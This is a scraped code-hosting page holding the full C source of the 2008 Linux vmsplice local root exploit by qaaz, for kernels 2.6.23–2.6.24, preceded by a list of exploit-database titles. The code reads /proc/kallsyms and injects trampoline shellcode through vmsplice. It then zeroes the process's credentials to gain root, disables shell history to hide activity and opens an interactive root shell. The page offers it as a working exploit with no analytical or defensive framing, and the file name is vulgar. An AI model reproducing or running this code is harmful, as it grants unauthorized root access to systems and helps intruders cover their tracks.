477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
147 lines
3 KiB
C
Executable file
147 lines
3 KiB
C
Executable file
/*
|
|
* diane_lane_fucked_hard.c
|
|
*
|
|
* Linux vmsplice Local Root Exploit
|
|
* By qaaz
|
|
*
|
|
* Linux 2.6.23 - 2.6.24
|
|
*/
|
|
#define _GNU_SOURCE
|
|
#include <stdio.h>
|
|
#include <errno.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <sys/uio.h>
|
|
|
|
#define TARGET_PATTERN " sys_vm86old"
|
|
#define TARGET_SYSCALL 113
|
|
|
|
#ifndef __NR_vmsplice
|
|
#define __NR_vmsplice 316
|
|
#endif
|
|
|
|
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
|
|
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
|
|
|
|
#define TRAMP_CODE (void *) trampoline
|
|
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
|
|
|
|
unsigned char trampoline[] =
|
|
"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */
|
|
"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */
|
|
"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
|
|
"\x75\x02" /* jne +2 */
|
|
"\xff\xd1" /* call *%ecx */
|
|
"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */
|
|
"\xc3" /* ret */
|
|
;
|
|
|
|
void die(char *msg, int err)
|
|
{
|
|
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
|
|
fflush(stdout);
|
|
fflush(stderr);
|
|
exit(1);
|
|
}
|
|
|
|
long get_target()
|
|
{
|
|
FILE *f;
|
|
long addr = 0;
|
|
char line[128];
|
|
|
|
f = fopen("/proc/kallsyms", "r");
|
|
if (!f) die("/proc/kallsyms", errno);
|
|
|
|
while (fgets(line, sizeof(line), f)) {
|
|
if (strstr(line, TARGET_PATTERN)) {
|
|
addr = strtoul(line, NULL, 16);
|
|
break;
|
|
}
|
|
}
|
|
|
|
fclose(f);
|
|
return addr;
|
|
}
|
|
|
|
static inline __attribute__((always_inline))
|
|
void * get_current()
|
|
{
|
|
unsigned long curr;
|
|
__asm__ __volatile__ (
|
|
"movl %%esp, %%eax ;"
|
|
"andl %1, %%eax ;"
|
|
"movl (%%eax), %0"
|
|
: "=r" (curr)
|
|
: "i" (~8191)
|
|
);
|
|
return (void *) curr;
|
|
}
|
|
|
|
static uint uid, gid;
|
|
|
|
void kernel_code()
|
|
{
|
|
int i;
|
|
uint *p = get_current();
|
|
|
|
for (i = 0; i < 1024-13; i++) {
|
|
if (p[0] == uid && p[1] == uid &&
|
|
p[2] == uid && p[3] == uid &&
|
|
p[4] == gid && p[5] == gid &&
|
|
p[6] == gid && p[7] == gid) {
|
|
p[0] = p[1] = p[2] = p[3] = 0;
|
|
p[4] = p[5] = p[6] = p[7] = 0;
|
|
p = (uint *) ((char *)(p + 8) + sizeof(void *));
|
|
p[0] = p[1] = p[2] = ~0;
|
|
break;
|
|
}
|
|
p++;
|
|
}
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int pi[2];
|
|
long addr;
|
|
struct iovec iov;
|
|
|
|
uid = getuid();
|
|
gid = getgid();
|
|
setresuid(uid, uid, uid);
|
|
setresgid(gid, gid, gid);
|
|
|
|
printf("-----------------------------------\n");
|
|
printf(" Linux vmsplice Local Root Exploit\n");
|
|
printf(" By qaaz\n");
|
|
printf("-----------------------------------\n");
|
|
|
|
if (!uid || !gid)
|
|
die("!@#$", 0);
|
|
|
|
addr = get_target();
|
|
printf("[+] addr: 0x%lx\n", addr);
|
|
|
|
if (pipe(pi) < 0)
|
|
die("pipe", errno);
|
|
|
|
iov.iov_base = (void *) addr;
|
|
iov.iov_len = TRAMP_SIZE;
|
|
|
|
write(pi[1], TRAMP_CODE, TRAMP_SIZE);
|
|
_vmsplice(pi[0], &iov, 1, 0);
|
|
|
|
gimmeroot();
|
|
|
|
if (getuid() != 0)
|
|
die("wtf", 0);
|
|
|
|
printf("[+] root\n");
|
|
putenv("HISTFILE=/dev/null");
|
|
execl("/bin/bash", "bash", "-i", NULL);
|
|
die("/bin/bash", errno);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2008-02-09]
|